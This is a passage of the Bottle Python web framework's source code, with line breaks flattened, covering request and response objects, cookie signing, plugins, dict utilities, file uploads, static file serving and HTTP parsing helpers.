a XMLHttpRequest. This only works with JavaScript libraries that support the `X-Requested-With` header (most of the popular libraries do). """ requested_with = self.environ.get('HTTP_X_REQUESTED_WITH','') return requested_with.lower() == 'xmlhttprequest' @property def is_ajax(self): """ Alias for :attr:`is_xhr`. "Ajax" is not the right term. """ return self.is_xhr @property def auth(self): """ HTTP authentication data as a (user, password) tuple. This implementation currently supports basic (not digest) authentication only. If the authentication happened at a higher level (e.g. in the front web-server or a middleware), the password field is None, but the user field is looked up from the ``REMOTE_USER`` environ variable. On any errors, None is returned. """ basic = parse_auth(self.environ.get('HTTP_AUTHORIZATION','')) if basic: return basic ruser = self.environ.get('REMOTE_USER') if ruser: return (ruser, None) return None @property def remote_route(self): """ A list of all IPs that were involved in this request, starting with the client IP and followed by zero or more proxies. This does only work if all proxies support the ```X-Forwarded-For`` header. Note that this information can be forged by malicious clients. """ proxy = self.environ.get('HTTP_X_FORWARDED_FOR') if proxy: return [ip.strip() for ip in proxy.split(',')] remote = self.environ.get('REMOTE_ADDR') return [remote] if remote else [] @property def remote_addr(self): """ The client IP as a string. Note that this information can be forged by malicious clients. """ route = self.remote_route return route[0] if route else None def copy(self): """ Return a new :class:`Request` with a shallow :attr:`environ` copy. """ return Request(self.environ.copy()) def get(self, value, default=None): return self.environ.get(value, default) def __getitem__(self, key): return self.environ[key] def __delitem__(self, key): self[key] = ""; del(self.environ[key]) def __iter__(self): return iter(self.environ) def __len__(self): return len(self.environ) def keys(self): return self.environ.keys() def __setitem__(self, key, value): """ Change an environ value and clear all caches that depend on it. """ if self.environ.get('bottle.request.readonly'): raise KeyError('The environ dictionary is read-only.') self.environ[key] = value todelete = () if key == 'wsgi.input': todelete = ('body', 'forms', 'files', 'params', 'post', 'json') elif key == 'QUERY_STRING': todelete = ('query', 'params') elif key.startswith('HTTP_'): todelete = ('headers', 'cookies') for key in todelete: self.environ.pop('bottle.request.'+key, None) def __repr__(self): return '<%s: %s %s>' % (self.__class__.__name__, self.method, self.url) def __getattr__(self, name): """ Search in self.environ for additional user defined attributes. """ try: var = self.environ['bottle.request.ext.%s'%name] return var.__get__(self) if hasattr(var, '__get__') else var except KeyError: raise AttributeError('Attribute %r not defined.' % name) def __setattr__(self, name, value): if name == 'environ': return object.__setattr__(self, name, value) self.environ['bottle.request.ext.%s'%name] = value def _hkey(s): return s.title().replace('_','-') class HeaderProperty(object): def __init__(self, name, reader=None, writer=str, default=''): self.name, self.default = name, default self.reader, self.writer = reader, writer self.__doc__ = 'Current value of the %r header.' % name.title() def __get__(self, obj, _): if obj is None: return self value = obj.headers.get(self.name, self.default) return self.reader(value) if self.reader else value def __set__(self, obj, value): obj.headers[self.name] = self.writer(value) def __delete__(self, obj): del obj.headers[self.name] class BaseResponse(object): """ Storage class for a response body as well as headers and cookies. This class does support dict-like case-insensitive item-access to headers, but is NOT a dict. Most notably, iterating over a response yields parts of the body and not the headers. :param body: The response body as one of the supported types. :param status: Either an HTTP status code (e.g. 200) or a status line including the reason phrase (e.g. '200 OK'). :param headers: A dictionary or a list of name-value pairs. Additional keyword arguments are added to the list of headers. Underscores in the header name are replaced with dashes. """ default_status = 200 default_content_type = 'text/html; charset=UTF-8' # Header blacklist for specific response codes # (rfc2616 section 10.2.3 and 10.3.5) bad_headers = { 204: set(('Content-Type',)), 304: set(('Allow', 'Content-Encoding', 'Content-Language', 'Content-Length', 'Content-Range', 'Content-Type', 'Content-Md5', 'Last-Modified'))} def __init__(self, body='', status=None, headers=None, **more_headers): self._cookies = None self._headers = {} self.body = body self.status = status or self.default_status if headers: if isinstance(headers, dict): headers = headers.items() for name, value in headers: self.add_header(name, value) if more_headers: for name, value in more_headers.items(): self.add_header(name, value) def copy(self, cls=None): """ Returns a copy of self. """ cls = cls or BaseResponse assert issubclass(cls, BaseResponse) copy = cls() copy.status = self.status copy._headers = dict((k, v[:]) for (k, v) in self._headers.items()) if self._cookies: copy._cookies = SimpleCookie() copy._cookies.load(self._cookies.output()) return copy def __iter__(self): return iter(self.body) def close(self): if hasattr(self.body, 'close'): self.body.close() @property def status_line(self): """ The HTTP status line as a string (e.g. ``404 Not Found``).""" return self._status_line @property def status_code(self): """ The HTTP status code as an integer (e.g. 404).""" return self._status_code def _set_status(self, status): if isinstance(status, int): code, status = status, _HTTP_STATUS_LINES.get(status) elif ' ' in status: status = status.strip() code = int(status.split()[0]) else: raise ValueError('String status line without a reason phrase.') if not 100 <= code <= 999: raise ValueError('Status code out of range.') self._status_code = code self._status_line = str(status or ('%d Unknown' % code)) def _get_status(self): return self._status_line status = property(_get_status, _set_status, None, ''' A writeable property to change the HTTP response status. It accepts either a numeric code (100-999) or a string with a custom reason phrase (e.g. "404 Brain not found"). Both :data:`status_line` and :data:`status_code` are updated accordingly. The return value is always a status string. ''') del _get_status, _set_status @property def headers(self): """ An instance of :class:`HeaderDict`, a case-insensitive dict-like view on the response headers. """ hdict = HeaderDict() hdict.dict = self._headers return hdict def __contains__(self, name): return _hkey(name) in self._headers def __delitem__(self, name): del self._headers[_hkey(name)] def __getitem__(self, name): return self._headers[_hkey(name)][-1] def __setitem__(self, name, value): self._headers[_hkey(name)] = [str(value)] def get_header(self, name, default=None): """ Return the value of a previously defined header. If there is no header with that name, return a default value. """ return self._headers.get(_hkey(name), [default])[-1] def set_header(self, name, value): """ Create a new response header, replacing any previously defined headers with the same name. """ self._headers[_hkey(name)] = [str(value)] def add_header(self, name, value): """ Add an additional response header, not removing duplicates. """ self._headers.setdefault(_hkey(name), []).append(str(value)) def iter_headers(self): """ Yield (header, value) tuples, skipping headers that are not allowed with the current response status code. """ return self.headerlist @property def headerlist(self): """ WSGI conform list of (header, value) tuples. """ out = [] headers = list(self._headers.items()) if 'Content-Type' not in self._headers: headers.append(('Content-Type', [self.default_content_type])) if self._status_code in self.bad_headers: bad_headers = self.bad_headers[self._status_code] headers = [h for h in headers if h[0] not in bad_headers] out += [(name, val) for name, vals in headers for val in vals] if self._cookies: for c in self._cookies.values(): out.append(('Set-Cookie', c.OutputString())) return out content_type = HeaderProperty('Content-Type') content_length = HeaderProperty('Content-Length', reader=int) expires = HeaderProperty('Expires', reader=lambda x: datetime.utcfromtimestamp(parse_date(x)), writer=lambda x: http_date(x)) @property def charset(self, default='UTF-8'): """ Return the charset specified in the content-type header (default: utf8). """ if 'charset=' in self.content_type: return self.content_type.split('charset=')[-1].split(';')[0].strip() return default def set_cookie(self, name, value, secret=None, **options): """ Create a new cookie or replace an old one. If the `secret` parameter is set, create a `Signed Cookie` (described below). :param name: the name of the cookie. :param value: the value of the cookie. :param secret: a signature key required for signed cookies. Additionally, this method accepts all RFC 2109 attributes that are supported by :class:`cookie.Morsel`, including: :param max_age: maximum age in seconds. (default: None) :param expires: a datetime object or UNIX timestamp. (default: None) :param domain: the domain that is allowed to read the cookie. (default: current domain) :param path: limits the cookie to a given path (default: current path) :param secure: limit the cookie to HTTPS connections (default: off). :param httponly: prevents client-side javascript to read this cookie (default: off, requires Python 2.6 or newer). If neither `expires` nor `max_age` is set (default), the cookie will expire at the end of the browser session (as soon as the browser window is closed). Signed cookies may store any pickle-able object and are cryptographically signed to prevent manipulation. Keep in mind that cookies are limited to 4kb in most browsers. Warning: Signed cookies are not encrypted (the client can still see the content) and not copy-protected (the client can restore an old cookie). The main intention is to make pickling and unpickling save, not to store secret information at client side. """ if not self._cookies: self._cookies = SimpleCookie() if secret: value = touni(cookie_encode((name, value), secret)) elif not isinstance(value, basestring): raise TypeError('Secret key missing for non-string Cookie.') if len(value) > 4096: raise ValueError('Cookie value to long.') self._cookies[name] = value for key, value in options.items(): if key == 'max_age': if isinstance(value, timedelta): value = value.seconds + value.days * 24 * 3600 if key == 'expires': if isinstance(value, (datedate, datetime)): value = value.timetuple() elif isinstance(value, (int, float)): value = time.gmtime(value) value = time.strftime("%a, %d %b %Y %H:%M:%S GMT", value) self._cookies[name][key.replace('_', '-')] = value def delete_cookie(self, key, **kwargs): """ Delete a cookie. Be sure to use the same `domain` and `path` settings as used to create the cookie. """ kwargs['max_age'] = -1 kwargs['expires'] = 0 self.set_cookie(key, '', **kwargs) def __repr__(self): out = '' for name, value in self.headerlist: out += '%s: %s\n' % (name.title(), value.strip()) return out def _local_property(): ls = threading.local() def fget(_): try: return ls.var except AttributeError: raise RuntimeError("Request context not initialized.") def fset(_, value): ls.var = value def fdel(_): del ls.var return property(fget, fset, fdel, 'Thread-local property') class LocalRequest(BaseRequest): """ A thread-local subclass of :class:`BaseRequest` with a different set of attributes for each thread. There is usually only one global instance of this class (:data:`request`). If accessed during a request/response cycle, this instance always refers to the *current* request (even on a multithreaded server). """ bind = BaseRequest.__init__ environ = _local_property() class LocalResponse(BaseResponse): """ A thread-local subclass of :class:`BaseResponse` with a different set of attributes for each thread. There is usually only one global instance of this class (:data:`response`). Its attributes are used to build the HTTP response at the end of the request/response cycle. """ bind = BaseResponse.__init__ _status_line = _local_property() _status_code = _local_property() _cookies = _local_property() _headers = _local_property() body = _local_property() Request = BaseRequest Response = BaseResponse class HTTPResponse(Response, BottleException): def __init__(self, body='', status=None, headers=None, **more_headers): super(HTTPResponse, self).__init__(body, status, headers, **more_headers) def apply(self, other): other._status_code = self._status_code other._status_line = self._status_line other._headers = self._headers other._cookies = self._cookies other.body = self.body class HTTPError(HTTPResponse): default_status = 500 def __init__(self, status=None, body=None, exception=None, traceback=None, **options): self.exception = exception self.traceback = traceback super(HTTPError, self).__init__(body, status, **options) ############################################################################### # Plugins ###################################################################### ############################################################################### class PluginError(BottleException): pass class JSONPlugin(object): name = 'json' api = 2 def __init__(self, json_dumps=json_dumps): self.json_dumps = json_dumps def apply(self, callback, _): dumps = self.json_dumps if not dumps: return callback def wrapper(*a, **ka): try: rv = callback(*a, **ka) except HTTPError: rv = _e() if isinstance(rv, dict): #Attempt to serialize, raises exception on failure json_response = dumps(rv) #Set content type only if serialization successful response.content_type = 'application/json' return json_response elif isinstance(rv, HTTPResponse) and isinstance(rv.body, dict): rv.body = dumps(rv.body) rv.content_type = 'application/json' return rv return wrapper class TemplatePlugin(object): """ This plugin applies the :func:`view` decorator to all routes with a `template` config parameter. If the parameter is a tuple, the second element must be a dict with additional options (e.g. `template_engine`) or default variables for the template. """ name = 'template' api = 2 def apply(self, callback, route): conf = route.config.get('template') if isinstance(conf, (tuple, list)) and len(conf) == 2: return view(conf[0], **conf[1])(callback) elif isinstance(conf, str): return view(conf)(callback) else: return callback #: Not a plugin, but part of the plugin API. TODO: Find a better place. class _ImportRedirect(object): def __init__(self, name, impmask): """ Create a virtual package that redirects imports (see PEP 302). """ self.name = name self.impmask = impmask self.module = sys.modules.setdefault(name, imp.new_module(name)) self.module.__dict__.update({'__file__': __file__, '__path__': [], '__all__': [], '__loader__': self}) sys.meta_path.append(self) def find_module(self, fullname, path=None): if '.' not in fullname: return packname = fullname.rsplit('.', 1)[0] if packname != self.name: return return self def load_module(self, fullname): if fullname in sys.modules: return sys.modules[fullname] modname = fullname.rsplit('.', 1)[1] realname = self.impmask % modname __import__(realname) module = sys.modules[fullname] = sys.modules[realname] setattr(self.module, modname, module) module.__loader__ = self return module ############################################################################### # Common Utilities ############################################################# ############################################################################### class MultiDict(DictMixin): """ This dict stores multiple values per key, but behaves exactly like a normal dict in that it returns only the newest value for any given key. There are special methods available to access the full list of values. """ def __init__(self, *a, **k): self.dict = dict((k, [v]) for (k, v) in dict(*a, **k).items()) def __len__(self): return len(self.dict) def __iter__(self): return iter(self.dict) def __contains__(self, key): return key in self.dict def __delitem__(self, key): del self.dict[key] def __getitem__(self, key): return self.dict[key][-1] def __setitem__(self, key, value): self.append(key, value) def keys(self): return self.dict.keys() if py3k: def values(self): return (v[-1] for v in self.dict.values()) def items(self): return ((k, v[-1]) for k, v in self.dict.items()) def allitems(self): return ((k, v) for k, vl in self.dict.items() for v in vl) iterkeys = keys itervalues = values iteritems = items iterallitems = allitems else: def values(self): return [v[-1] for v in self.dict.values()] def items(self): return [(k, v[-1]) for k, v in self.dict.items()] def iterkeys(self): return self.dict.iterkeys() def itervalues(self): return (v[-1] for v in self.dict.itervalues()) def iteritems(self): return ((k, v[-1]) for k, v in self.dict.iteritems()) def iterallitems(self): return ((k, v) for k, vl in self.dict.iteritems() for v in vl) def allitems(self): return [(k, v) for k, vl in self.dict.iteritems() for v in vl] def get(self, key, default=None, index=-1, type=None): """ Return the most recent value for a key. :param default: The default value to be returned if the key is not present or the type conversion fails. :param index: An index for the list of available values. :param type: If defined, this callable is used to cast the value into a specific type. Exception are suppressed and result in the default value to be returned. """ try: val = self.dict[key][index] return type(val) if type else val except Exception: pass return default def append(self, key, value): """ Add a new value to the list of values for this key. """ self.dict.setdefault(key, []).append(value) def replace(self, key, value): """ Replace the list of values with a single value. """ self.dict[key] = [value] def getall(self, key): """ Return a (possibly empty) list of values for a key. """ return self.dict.get(key) or [] #: Aliases for WTForms to mimic other multi-dict APIs (Django) getone = get getlist = getall class FormsDict(MultiDict): """ This :class:`MultiDict` subclass is used to store request form data. Additionally to the normal dict-like item access methods (which return unmodified data as native strings), this container also supports attribute-like access to its values. Attributes are automatically de- or recoded to match :attr:`input_encoding` (default: 'utf8'). Missing attributes default to an empty string. """ #: Encoding used for attribute values. input_encoding = 'utf8' #: If true (default), unicode strings are first encoded with `latin1` #: and then decoded to match :attr:`input_encoding`. recode_unicode = True def _fix(self, s, encoding=None): if isinstance(s, unicode) and self.recode_unicode: # Python 3 WSGI return s.encode('latin1').decode(encoding or self.input_encoding) elif isinstance(s, bytes): # Python 2 WSGI return s.decode(encoding or self.input_encoding) else: return s def decode(self, encoding=None): """ Returns a copy with all keys and values de- or recoded to match :attr:`input_encoding`. Some libraries (e.g. WTForms) want a unicode dictionary. """ copy = FormsDict() enc = copy.input_encoding = encoding or self.input_encoding copy.recode_unicode = False for key, value in self.allitems(): copy.append(self._fix(key, enc), self._fix(value, enc)) return copy def getunicode(self, name, default=None, encoding=None): """ Return the value as a unicode string, or the default. """ try: return self._fix(self[name], encoding) except (UnicodeError, KeyError): return default def __getattr__(self, name, default=unicode()): # Without this guard, pickle generates a cryptic TypeError: if name.startswith('__') and name.endswith('__'): return super(FormsDict, self).__getattr__(name) return self.getunicode(name, default=default) class HeaderDict(MultiDict): """ A case-insensitive version of :class:`MultiDict` that defaults to replace the old value instead of appending it. """ def __init__(self, *a, **ka): self.dict = {} if a or ka: self.update(*a, **ka) def __contains__(self, key): return _hkey(key) in self.dict def __delitem__(self, key): del self.dict[_hkey(key)] def __getitem__(self, key): return self.dict[_hkey(key)][-1] def __setitem__(self, key, value): self.dict[_hkey(key)] = [str(value)] def append(self, key, value): self.dict.setdefault(_hkey(key), []).append(str(value)) def replace(self, key, value): self.dict[_hkey(key)] = [str(value)] def getall(self, key): return self.dict.get(_hkey(key)) or [] def get(self, key, default=None, index=-1): return MultiDict.get(self, _hkey(key), default, index) def filter(self, names): for name in [_hkey(n) for n in names]: if name in self.dict: del self.dict[name] class WSGIHeaderDict(DictMixin): """ This dict-like class wraps a WSGI environ dict and provides convenient access to HTTP_* fields. Keys and values are native strings (2.x bytes or 3.x unicode) and keys are case-insensitive. If the WSGI environment contains non-native string values, these are de- or encoded using a lossless 'latin1' character set. The API will remain stable even on changes to the relevant PEPs. Currently PEP 333, 444 and 3333 are supported. (PEP 444 is the only one that uses non-native strings.) """ #: List of keys that do not have a ``HTTP_`` prefix. cgikeys = ('CONTENT_TYPE', 'CONTENT_LENGTH') def __init__(self, environ): self.environ = environ def _ekey(self, key): """ Translate header field name to CGI/WSGI environ key. """ key = key.replace('-','_').upper() if key in self.cgikeys: return key return 'HTTP_' + key def raw(self, key, default=None): """ Return the header value as is (may be bytes or unicode). """ return self.environ.get(self._ekey(key), default) def __getitem__(self, key): return tonat(self.environ[self._ekey(key)], 'latin1') def __setitem__(self, key, value): raise TypeError("%s is read-only." % self.__class__) def __delitem__(self, key): raise TypeError("%s is read-only." % self.__class__) def __iter__(self): for key in self.environ: if key[:5] == 'HTTP_': yield _hkey(key[5:]) elif key in self.cgikeys: yield _hkey(key) def keys(self): return [x for x in self] def __len__(self): return len(self.keys()) def __contains__(self, key): return self._ekey(key) in self.environ class ConfigDict(dict): """ A dict-like configuration storage with additional support for namespaces, validators, meta-data, on_change listeners and more. """ __slots__ = ('_meta', '_on_change') def __init__(self): self._meta = {} self._on_change = lambda name, value: None def load_config(self, filename): """ Load values from an ``*.ini`` style config file. If the config file contains sections, their names are used as namespaces for the values within. The two special sections ``DEFAULT`` and ``bottle`` refer to the root namespace (no prefix). """ conf = ConfigParser() conf.read(filename) for section in conf.sections(): for key, value in conf.items(section): if section not in ('DEFAULT', 'bottle'): key = section + '.' + key self[key] = value return self def load_dict(self, source, namespace=''): """ Load values from a dictionary structure. Nesting can be used to represent namespaces. >>> c = ConfigDict() >>> c.load_dict({'some': {'namespace': {'key': 'value'} } }) {'some.namespace.key': 'value'} """ for key, value in source.items(): if isinstance(key, str): nskey = (namespace + '.' + key).strip('.') if isinstance(value, dict): self.load_dict(value, namespace=nskey) else: self[nskey] = value else: raise TypeError('Key has type %r (not a string)' % type(key)) return self def update(self, *a, **ka): """ If the first parameter is a string, all keys are prefixed with this namespace. Apart from that it works just as the usual dict.update(). Example: ``update('some.namespace', key='value')`` """ prefix = '' if a and isinstance(a[0], str): prefix = a[0].strip('.') + '.' a = a[1:] for key, value in dict(*a, **ka).items(): self[prefix+key] = value def setdefault(self, key, value): if key not in self: self[key] = value def __setitem__(self, key, value): if not isinstance(key, str): raise TypeError('Key has type %r (not a string)' % type(key)) value = self.meta_get(key, 'filter', lambda x: x)(value) if key in self and self[key] is value: return self._on_change(key, value) dict.__setitem__(self, key, value) def __delitem__(self, key): self._on_change(key, None) dict.__delitem__(self, key) def meta_get(self, key, metafield, default=None): """ Return the value of a meta field for a key. """ return self._meta.get(key, {}).get(metafield, default) def meta_set(self, key, metafield, value): """ Set the meta field for a key to a new value. This triggers the on-change handler for existing keys. """ self._meta.setdefault(key, {})[metafield] = value if key in self: self[key] = self[key] def meta_list(self, key): """ Return an iterable of meta field names defined for a key. """ return self._meta.get(key, {}).keys() class AppStack(list): """ A stack-like list. Calling it returns the head of the stack. """ def __call__(self): """ Return the current default application. """ return self[-1] def push(self, value=None): """ Add a new :class:`Bottle` instance to the stack """ if not isinstance(value, Bottle): value = Bottle() self.append(value) return value class WSGIFileWrapper(object): def __init__(self, fp, buffer_size=1024*64): self.fp, self.buffer_size = fp, buffer_size for attr in ('fileno', 'close', 'read', 'readlines', 'tell', 'seek'): if hasattr(fp, attr): setattr(self, attr, getattr(fp, attr)) def __iter__(self): buff, read = self.buffer_size, self.read while True: part = read(buff) if not part: return yield part class _closeiter(object): """ This only exists to be able to attach a .close method to iterators that do not support attribute assignment (most of itertools). """ def __init__(self, iterator, close=None): self.iterator = iterator self.close_callbacks = makelist(close) def __iter__(self): return iter(self.iterator) def close(self): for func in self.close_callbacks: func() class ResourceManager(object): """ This class manages a list of search paths and helps to find and open application-bound resources (files). :param base: default value for :meth:`add_path` calls. :param opener: callable used to open resources. :param cachemode: controls which lookups are cached. One of 'all', 'found' or 'none'. """ def __init__(self, base='./', opener=open, cachemode='all'): self.opener = opener self.base = base self.cachemode = cachemode #: A list of search paths. See :meth:`add_path` for details. self.path = [] #: A cache for resolved paths. ``res.cache.clear()`` clears the cache. self.cache = {} def add_path(self, path, base=None, index=None, create=False): """ Add a new path to the list of search paths. Return False if the path does not exist. :param path: The new search path. Relative paths are turned into an absolute and normalized form. If the path looks like a file (not ending in `/`), the filename is stripped off. :param base: Path used to absolutize relative search paths. Defaults to :attr:`base` which defaults to ``os.getcwd()``. :param index: Position within the list of search paths. Defaults to last index (appends to the list). The `base` parameter makes it easy to reference files installed along with a python module or package:: res.add_path('./resources/', __file__) """ base = os.path.abspath(os.path.dirname(base or self.base)) path = os.path.abspath(os.path.join(base, os.path.dirname(path))) path += os.sep if path in self.path: self.path.remove(path) if create and not os.path.isdir(path): os.makedirs(path) if index is None: self.path.append(path) else: self.path.insert(index, path) self.cache.clear() return os.path.exists(path) def __iter__(self): """ Iterate over all existing files in all registered paths. """ search = self.path[:] while search: path = search.pop() if not os.path.isdir(path): continue for name in os.listdir(path): full = os.path.join(path, name) if os.path.isdir(full): search.append(full) else: yield full def lookup(self, name): """ Search for a resource and return an absolute file path, or `None`. The :attr:`path` list is searched in order. The first match is returend. Symlinks are followed. The result is cached to speed up future lookups. """ if name not in self.cache or DEBUG: for path in self.path: fpath = os.path.join(path, name) if os.path.isfile(fpath): if self.cachemode in ('all', 'found'): self.cache[name] = fpath return fpath if self.cachemode == 'all': self.cache[name] = None return self.cache[name] def open(self, name, mode='r', *args, **kwargs): """ Find a resource and return a file object, or raise IOError. """ fname = self.lookup(name) if not fname: raise IOError("Resource %r not found." % name) return self.opener(fname, mode=mode, *args, **kwargs) class FileUpload(object): def __init__(self, fileobj, name, filename, headers=None): """ Wrapper for file uploads. """ #: Open file(-like) object (BytesIO buffer or temporary file) self.file = fileobj #: Name of the upload form field self.name = name #: Raw filename as sent by the client (may contain unsafe characters) self.raw_filename = filename #: A :class:`HeaderDict` with additional headers (e.g. content-type) self.headers = HeaderDict(headers) if headers else HeaderDict() content_type = HeaderProperty('Content-Type') content_length = HeaderProperty('Content-Length', reader=int, default=-1) @cached_property def filename(self): """ Name of the file on the client file system, but normalized to ensure file system compatibility. An empty filename is returned as 'empty'. Only ASCII letters, digits, dashes, underscores and dots are allowed in the final filename. Accents are removed, if possible. Whitespace is replaced by a single dash. Leading or tailing dots or dashes are removed. The filename is limited to 255 characters. """ fname = self.raw_filename if not isinstance(fname, unicode): fname = fname.decode('utf8', 'ignore') fname = normalize('NFKD', fname).encode('ASCII', 'ignore').decode('ASCII') fname = os.path.basename(fname.replace('\\', os.path.sep)) fname = re.sub(r'[^a-zA-Z0-9-_.\s]', '', fname).strip() fname = re.sub(r'[-\s]+', '-', fname).strip('.-') return fname[:255] or 'empty' def _copy_file(self, fp, chunk_size=2**16): read, write, offset = self.file.read, fp.write, self.file.tell() while 1: buf = read(chunk_size) if not buf: break write(buf) self.file.seek(offset) def save(self, destination, overwrite=False, chunk_size=2**16): """ Save file to disk or copy its content to an open file(-like) object. If *destination* is a directory, :attr:`filename` is added to the path. Existing files are not overwritten by default (IOError). :param destination: File path, directory or file(-like) object. :param overwrite: If True, replace existing files. (default: False) :param chunk_size: Bytes to read at a time. (default: 64kb) """ if isinstance(destination, basestring): # Except file-likes here if os.path.isdir(destination): destination = os.path.join(destination, self.filename) if not overwrite and os.path.exists(destination): raise IOError('File exists.') with open(destination, 'wb') as fp: self._copy_file(fp, chunk_size) else: self._copy_file(destination, chunk_size) ############################################################################### # Application Helper ########################################################### ############################################################################### def abort(code=500, text='Unknown Error.'): """ Aborts execution and causes a HTTP error. """ raise HTTPError(code, text) def redirect(url, code=None): """ Aborts execution and causes a 303 or 302 redirect, depending on the HTTP protocol version. """ if not code: code = 303 if request.get('SERVER_PROTOCOL') == "HTTP/1.1" else 302 res = response.copy(cls=HTTPResponse) res.status = code res.body = "" res.set_header('Location', urljoin(request.url, url)) raise res def _file_iter_range(fp, offset, bytes, maxread=1024*1024): """ Yield chunks from a range in a file. No chunk is bigger than maxread.""" fp.seek(offset) while bytes > 0: part = fp.read(min(bytes, maxread)) if not part: break bytes -= len(part) yield part def static_file(filename, root, mimetype='auto', download=False, charset='UTF-8'): """ Open a file in a safe way and return :exc:`HTTPResponse` with status code 200, 305, 403 or 404. The ``Content-Type``, ``Content-Encoding``, ``Content-Length`` and ``Last-Modified`` headers are set if possible. Special support for ``If-Modified-Since``, ``Range`` and ``HEAD`` requests. :param filename: Name or path of the file to send. :param root: Root path for file lookups. Should be an absolute directory path. :param mimetype: Defines the content-type header (default: guess from file extension) :param download: If True, ask the browser to open a `Save as...` dialog instead of opening the file with the associated program. You can specify a custom filename as a string. If not specified, the original filename is used (default: False). :param charset: The charset to use for files with a ``text/*`` mime-type. (default: UTF-8) """ root = os.path.abspath(root) + os.sep filename = os.path.abspath(os.path.join(root, filename.strip('/\\'))) headers = dict() if not filename.startswith(root): return HTTPError(403, "Access denied.") if not os.path.exists(filename) or not os.path.isfile(filename): return HTTPError(404, "File does not exist.") if not os.access(filename, os.R_OK): return HTTPError(403, "You do not have permission to access this file.") if mimetype == 'auto': mimetype, encoding = mimetypes.guess_type(filename) if encoding: headers['Content-Encoding'] = encoding if mimetype: if mimetype[:5] == 'text/' and charset and 'charset' not in mimetype: mimetype += '; charset=%s' % charset headers['Content-Type'] = mimetype if download: download = os.path.basename(filename if download == True else download) headers['Content-Disposition'] = 'attachment; filename="%s"' % download stats = os.stat(filename) headers['Content-Length'] = clen = stats.st_size lm = time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime(stats.st_mtime)) headers['Last-Modified'] = lm ims = request.environ.get('HTTP_IF_MODIFIED_SINCE') if ims: ims = parse_date(ims.split(";")[0].strip()) if ims is not None and ims >= int(stats.st_mtime): headers['Date'] = time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime()) return HTTPResponse(status=304, **headers) body = '' if request.method == 'HEAD' else open(filename, 'rb') headers["Accept-Ranges"] = "bytes" ranges = request.environ.get('HTTP_RANGE') if 'HTTP_RANGE' in request.environ: ranges = list(parse_range_header(request.environ['HTTP_RANGE'], clen)) if not ranges: return HTTPError(416, "Requested Range Not Satisfiable") offset, end = ranges[0] headers["Content-Range"] = "bytes %d-%d/%d" % (offset, end-1, clen) headers["Content-Length"] = str(end-offset) if body: body = _file_iter_range(body, offset, end-offset) return HTTPResponse(body, status=206, **headers) return HTTPResponse(body, **headers) ############################################################################### # HTTP Utilities and MISC (TODO) ############################################### ############################################################################### def debug(mode=True): """ Change the debug level. There is only one debug level supported at the moment.""" global DEBUG if mode: warnings.simplefilter('default') DEBUG = bool(mode) def http_date(value): if isinstance(value, (datedate, datetime)): value = value.utctimetuple() elif isinstance(value, (int, float)): value = time.gmtime(value) if not isinstance(value, basestring): value = time.strftime("%a, %d %b %Y %H:%M:%S GMT", value) return value def parse_date(ims): """ Parse rfc1123, rfc850 and asctime timestamps and return UTC epoch. """ try: ts = email.utils.parsedate_tz(ims) return time.mktime(ts[:8] + (0,)) - (ts[9] or 0) - time.timezone except (TypeError, ValueError, IndexError, OverflowError): return None def parse_auth(header): """ Parse rfc2617 HTTP authentication header string (basic) and return (user,pass) tuple or None""" try: method, data = header.split(None, 1) if method.lower() == 'basic': user, pwd = touni(base64.b64decode(tob(data))).split(':',1) return user, pwd except (KeyError, ValueError): return None def parse_range_header(header, maxlen=0): """ Yield (start, end) ranges parsed from a HTTP Range header. Skip unsatisfiable ranges. The end index is non-inclusive.""" if not header or header[:6] != 'bytes=': return ranges = [r.split('-', 1) for r in header[6:].split(',') if '-' in r] for start, end in ranges: try: if not start: # bytes=-100 -> last 100 bytes start, end = max(0, maxlen-int(end)), maxlen elif not end: # bytes=100- -> all but the first 99 bytes start, end = int(start), maxlen else: # bytes=100-200 -> bytes 100-200 (inclusive) start, end = int(start), min(int(end)+1, maxlen) if 0 <= start < end <= maxlen: yield start, end except ValueError: pass def _parse_qsl(qs): r = [] for pair in qs.replace(';','&').split('&'): if not pair: continue nv = pair.split('=', 1) if len(nv) != 2: nv.append('') key = urlunquote(nv[0].replace('+', ' ')) value = urlunquote(nv[1].replace('+', ' ')) r.append((key, value)) return r def _lscmp(a, b): """ Compares two strings in a cryptographically safe way: Runtime is not affected by length of common prefix. """ return not sum(0 if x==y else 1 for x, y in zip(a, b)) and len(a) == len(b) def cookie_encode(data, key): """ Encode and sign a pickle-able object. Return a (byte) string """ msg = base64.b64encode(pickle.dumps(data, -1)) sig = base64.b64encode(hmac.new(tob(key), msg).digest()) return tob('!') + sig + tob('?') + msg def cookie_decode(data, key): """ Verify and decode an encoded string. Return an object or None.""" data = tob(data) if cookie_is_encoded(data): sig, msg = data.split(tob('?'), 1) if _lscmp(sig[1:], base64.b64encode(hmac.new(tob(key), msg).digest())): return pickle.loads(base64.b64decode(msg)) return None def cookie_is_encoded(data): """ Return True if the argument looks like a encoded cookie.""" return bool(data.startswith(tob('!')) and tob('?') in data) def html_escape(string): """ Escape HTML special characters ``&<>`` and quotes ``'"``. """ return string.replace('&','&amp;').replace('<','&lt;').replace('>','&gt;')\ .replace('"','&quot;').replace("'",'&#039;') def html_quote(string): """ Escape and quote a string to be used as an HTTP attribute.""" return '"%s"' % html_escape(string).replace('\n','&#10;')\ .replace('\r','&#13;').replace('\t','&#9;') def yieldroutes(func): """ Return a generator for routes that match the signature (name, args) of the func parameter. This may yield more than one route if the function takes optional keyword arguments. The output is best described by example:: a() -> '/a' b(x, y) -> '/b/<x>/<y>' c(x, y=5) -> '/c/<x>' and '/c/<x>/<y>' d(x=5, y=6) -> '/d' and '/d/<x>' and '/d/<x>/<y>' """ path = '/' + func.__name__.replace('__','/').lstrip('/') spec = getargspec(func) argc = len(spec[0]) - len(spec[3] or []) path += ('/<%s>' * argc) % tuple(spec[0][:argc]) yield path for arg in spec[0][argc:]: path += '/<%s>' % arg yield path def path_shift(script_name, path_info, shift=1): """ Shift path fragments from PATH_INFO to SCRIPT_NAME and vice versa. :return: The modified paths. :param script_name: The SCRIPT_NAME path. :param script_name: The PATH_INFO path. :param shift: The number of path fragments to shift. May be negative to change the shift direction. (default: 1) """ if shift == 0: return script_name, path_info pathlist = path_info.strip('/').split('/') scriptlist = script_name.strip('/').split('/') if pathlist and pathlist[0] == '': pathlist = [] if scriptlist and scriptlist[0] == '': scriptlist = [] if 0 < shift <= len(pathlist): moved = pathlist[:shift] scriptlist = scriptlist + moved pathlist = pathlist[shift:] elif 0 > shift >= -len(scriptlist): moved = scriptlist[shift:] pathlist = moved + 